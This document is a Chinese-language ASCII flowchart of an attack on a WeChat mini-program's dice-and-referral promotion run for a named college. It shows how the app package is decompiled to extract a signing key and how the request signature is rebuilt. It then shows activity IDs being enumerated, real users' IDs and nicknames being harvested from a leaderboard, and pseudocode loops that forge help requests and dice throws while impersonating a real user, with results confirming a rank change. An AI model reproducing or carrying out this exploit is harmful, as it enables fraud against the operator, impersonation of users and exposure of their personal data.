攻击流程图
===========

┌─────────────────────────────────────────────────────────────────┐
│  阶段 1: 信息收集                                                │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  微信打开小程序 ──> 本地缓存 wxapkg 文件                          │
│                         │                                       │
│                         ▼                                       │
│              反编译解密 wxapkg                                   │
│              (AES-CBC + XOR)                                    │
│                         │                                       │
│                         ▼                                       │
│              获取完整前端源码                                    │
│              ├── common/config.js                               │
│              │   └── signKey = "<REDACTED>"  ◄── 关键  │
│              ├── common/request.js                              │
│              │   └── 签名算法实现                                │
│              └── subpackages/game/pages/help.vue                │
│                  └── 设备指纹算法                                │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
                              │
                              ▼
┌─────────────────────────────────────────────────────────────────┐
│  阶段 2: 签名复现                                                │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  从源码提取:                                                     │
│  ├── signKey = "<REDACTED>"                           │
│  ├── 排序规则: key 按字母排序 (不区分大小写)                      │
│  ├── 拼接规则: values + timestamp(毫秒) + signKey               │
│  └── 哈希规则: MD5 -> 大写                                      │
│                         │                                       │
│                         ▼                                       │
│  Python 复现签名函数 ──> 生成合法请求头                           │
│  wxminiapisign2: MD5(values+ts+key).upper()                     │
│  wxminiapitimespan: 毫秒时间戳                                  │
│  wxminiapitimenonce: MD5(ts+key).upper()                        │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
                              │
                              ▼
┌─────────────────────────────────────────────────────────────────┐
│  阶段 3: 目标发现                                                │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  GetCompanysByActId (遍历 ActId 1~3000)                         │
│  ┌──────────────────────────────────────────────────┐           │
│  │ ActId=2092 -> CusId=3824 江西旅游商贸职业学院     │           │
│  └──────────────────────────────────────────────────┘           │
│                         │                                       │
│                         ▼                                       │
│  GetActivityList (CusId=3824)                                   │
│  ┌──────────────────────────────────────────────────┐           │
│  │ ActId=2092 ActState=0 (进行中)                    │           │
│  │ 活动时间: 2026-06-15 ~ 2026-06-19                │           │
│  └──────────────────────────────────────────────────┘           │
│                         │                                       │
│                         ▼                                       │
│  GetMapRank (ActId=2092, CusId=3824)  ◄── 泄露用户数据          │
│  ┌──────────────────────────────────────────────────┐           │
│  │ Rank 1: UserId=476964 Nick=姜   BeHelpCount=129  │           │
│  │ Rank 2: UserId=476832 Nick=     BeHelpCount=77   │           │
│  │ Rank 4: UserId=477320 Nick=陆俊宇 BeHelpCount=101│           │
│  │ ... 共 10 名真实用户                              │           │
│  └──────────────────────────────────────────────────┘           │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
                              │
                              ▼
┌─────────────────────────────────────────────────────────────────┐
│  阶段 4: 漏洞利用                                                │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  攻击 A: 伪造助力                                                │
│  ┌──────────────────────────────────────────────────┐           │
│  │ for i in range(50):                              │           │
│  │   HelpUserId = random(100000, 999999)  ◄── 随机   │           │
│  │   POST UserHelp({                                │           │
│  │     ShareUserId: 477320,  ◄── 真实用户            │           │
│  │     HelpUserId: HelpUserId,                      │           │
│  │     ActId: 2092, CusId: 3824                    │           │
│  │   })                                             │           │
│  │   -> IsSuccess: true                             │           │
│  │   -> "恭喜你获得了10次掷骰子的机会"               │           │
│  │                                                  │           │
│  │ 结果: 50/50 成功, HelpCount 118 -> 141 (+23)     │           │
│  └──────────────────────────────────────────────────┘           │
│                         │                                       │
│                         ▼                                       │
│  攻击 B: 伪造掷骰子 (消耗助力获得的骰子次数)                      │
│  ┌──────────────────────────────────────────────────┐           │
│  │ for i in range(150):                             │           │
│  │   GET DiceThrowing({                             │           │
│  │     UserId: 477320,  ◄── 冒充目标用户             │           │
│  │     ActId: 2092, CusId: 3824                    │           │
│  │   })                                             │           │
│  │   -> Point: random(1~6)                          │           │
│  │   -> RemainTimes: -1                             │           │
│  │                                                  │           │
│  │ 结果: TotalStep 3219 -> 3698 (+479)              │           │
│  │       排名 #2 -> #1                               │           │
│  └──────────────────────────────────────────────────┘           │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
                              │
                              ▼
┌─────────────────────────────────────────────────────────────────┐
│  阶段 5: 验证结果                                                │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  GetMapRank (再次查询排行榜)                                     │
│  ┌──────────────────────────────────────────────────┐           │
│  │ Rank 1: UserId=477320 Steps=3698 (原 #2, 3219)   │ ◄── 确认  │
│  │ 排行榜数据已同步更新                              │           │
│  └──────────────────────────────────────────────────┘           │
│                                                                 │
│  GetHelpInfo (查询助力数据)                                      │
│  ┌──────────────────────────────────────────────────┐           │
│  │ UserId=477320 HelpCount=141 (原 118)             │ ◄── 确认  │
│  │ 伪造助力已写入数据库                              │           │
│  └──────────────────────────────────────────────────┘           │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
